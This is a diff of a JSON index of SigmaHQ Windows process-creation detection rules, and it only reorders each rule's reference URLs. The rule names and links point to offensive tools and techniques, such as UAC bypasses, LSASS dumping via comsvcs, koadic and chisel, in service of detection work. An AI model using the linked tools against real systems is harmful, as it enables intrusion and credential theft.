 "https://twitter.com/SBousseaden/status/1211636381086339073",
- "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
- "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
+ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
 ],
 "tags": [
@@ -51663,8 +51687,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/sensepost/impersonate",
 "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/",
+ "https://github.com/sensepost/impersonate",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impersonate_tool.yml"
 ],
 "tags": [
@@ -51706,8 +51730,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2",
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml"
 ],
 "tags": [
@@ -51804,9 +51828,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://twitter.com/jonasLyk/status/1555914501802921984",
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml"
 ],
 "tags": [
@@ -51907,8 +51931,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Gal_B1t/status/1062971006078345217",
 "https://twitter.com/hexacorn/status/1448037865435320323",
+ "https://twitter.com/Gal_B1t/status/1062971006078345217",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml"
 ],
 "tags": [
@@ -52015,9 +52039,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
 "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
 "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
+ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml"
 ],
 "tags": [
@@ -52300,9 +52324,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nao_sec/status/1530196847679401984",
- "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
 "https://twitter.com/_JohnHammond/status/1531672601067675648",
+ "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml"
 ],
 "tags": [
@@ -52401,11 +52425,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
 "https://twitter.com/GadixCRK/status/1369313704869834753?s=20",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
 "https://twitter.com/BleepinComputer/status/1372218235949617161",
 "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml"
 ],
 "tags": [
@@ -52439,8 +52463,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
 "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml"
 ],
@@ -52606,10 +52630,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/",
 "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support",
- "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
+ "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/",
 "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
+ "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml"
 ],
 "tags": [
@@ -52700,8 +52724,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax",
 "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html",
+ "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"
 ],
 "tags": [
@@ -52860,8 +52884,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml"
 ],
 "tags": [
@@ -52884,8 +52908,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt",
 "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/",
+ "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml"
 ],
 "tags": [
@@ -52996,9 +53020,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
 "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
 "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml"
 ],
 "tags": [
@@ -53151,9 +53175,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/lukebaggett/dnscat2-powershell",
 "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html",
 "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html",
+ "https://github.com/lukebaggett/dnscat2-powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml"
 ],
 "tags": [
@@ -53252,8 +53276,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/",
- "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/",
 "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
+ "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml"
 ],
 "tags": [
@@ -53321,8 +53345,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/",
 "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-",
+ "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml"
 ],
 "tags": [
@@ -53601,8 +53625,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml"
 ],
 "tags": [
@@ -53800,10 +53824,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
 "https://nodejs.org/api/cli.html",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml"
 ],
 "tags": [
@@ -53836,8 +53860,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/JohnLaTwC/status/1082851155481288706",
 "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03",
+ "https://twitter.com/JohnLaTwC/status/1082851155481288706",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml"
 ],
 "tags": [
@@ -53871,8 +53895,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
- "https://github.com/hfiref0x/UACME",
 "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml"
 ],
 "tags": [
@@ -54040,10 +54064,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
 "https://adsecurity.org/?p=2604",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
 "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml"
 ],
 "tags": [
@@ -54076,8 +54100,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA",
 "https://twitter.com/pabraeken/status/990717080805789697",
+ "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA",
 "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml"
 ],
@@ -54137,8 +54161,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/mttaggart/quasar",
 "https://taggart-tech.com/quasar-electron/",
+ "https://github.com/mttaggart/quasar",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml"
 ],
 "tags": [
@@ -54194,12 +54218,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Wietze/status/1542107456507203586",
+ "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
 "https://twitter.com/shantanukhande/status/1229348874298388484",
- "https://twitter.com/Hexacorn/status/1224848930795552769",
 "https://twitter.com/pythonresponder/status/1385064506049630211?s=21",
 "https://twitter.com/SBousseaden/status/1167417096374050817",
- "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
+ "https://twitter.com/Hexacorn/status/1224848930795552769",
+ "https://twitter.com/Wietze/status/1542107456507203586",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml"
 ],
 "tags": [
@@ -54236,15 +54260,15 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
 "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
 "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml"
 ],
 "tags": [
@@ -54377,8 +54401,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml"
 ],
 "tags": [
@@ -54467,9 +54491,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/pabraeken/status/990758590020452353",
 "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/",
- "https://twitter.com/pabraeken/status/990758590020452353",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"
 ],
 "tags": [
@@ -54502,9 +54526,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
 "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
 "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/",
- "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml"
 ],
 "tags": [
@@ -54710,9 +54734,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection",
 "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml",
 "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml"
 ],
 "tags": [
@@ -54788,10 +54812,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vysecurity/status/873181705024266241",
- "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
 "https://twitter.com/vysecurity/status/974806438316072960",
+ "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
+ "https://twitter.com/vysecurity/status/873181705024266241",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml"
 ],
 "tags": [
@@ -54859,8 +54883,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
 "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"
 ],
 "tags": [
@@ -54901,8 +54925,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
 "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
 "https://github.com/jpillora/chisel/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml"
 ],
@@ -54993,8 +55017,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
 "https://twitter.com/pabraeken/status/993497996179492864",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml"
 ],
 "tags": [
@@ -55095,8 +55119,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml"
 ],
 "tags": [
@@ -55120,8 +55144,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml"
 ],
 "tags": [
@@ -55514,8 +55538,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml"
 ],
 "tags": [
@@ -55581,8 +55605,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
 "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
+ "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
 "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml"
 ],
@@ -55649,10 +55673,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/",
+ "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/",
 "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/",
 "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/",
- "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/",
+ "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml"
 ],
 "tags": [
@@ -55825,9 +55849,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
 "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml"
 ],
 "tags": [
@@ -55903,8 +55927,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/cw1997/NATBypass",
 "https://github.com/HiwinCN/HTran",
+ "https://github.com/cw1997/NATBypass",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_htran.yml"
 ],
 "tags": [
@@ -55938,8 +55962,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml"
 ],
 "tags": [
@@ -55972,9 +55996,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
- "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
 "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/",
+ "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
+ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"
 ],
 "tags": [
@@ -56330,8 +56354,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md",
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml"
 ],
 "tags": [
@@ -56422,10 +56446,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/antonioCoco/RogueWinRM",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
 "https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://github.com/antonioCoco/RogueWinRM",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
 ],
 "tags": [
@@ -56458,10 +56482,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
 "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
 "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers",
+ "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
